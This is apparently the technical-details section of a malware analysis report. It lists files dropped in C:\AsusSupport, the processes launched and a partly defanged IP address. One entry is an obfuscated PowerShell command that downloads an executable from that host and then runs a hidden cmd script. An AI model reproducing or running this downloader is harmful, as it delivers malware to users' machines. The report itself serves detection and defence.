Technical Information
- 'C:\asussupport\kilskhdeuyrg.exe'
- <SYSTEM32>\wermgr.exe
- C:\asussupport\kreuitrsfyrgryfvft5.cmd
- C:\asussupport\kilskhdeuyrg.exe
- %TEMP%\logc526.tmp
- %TEMP%\logc526.tmp
- http://18#.#42.99.32/img.php
- '<SYSTEM32>\cmd.exe' /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://18#.#42.99.32/img.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
- '<SYSTEM32>\wermgr.exe'
- '<SYSTEM32>\timeout.exe' /T 10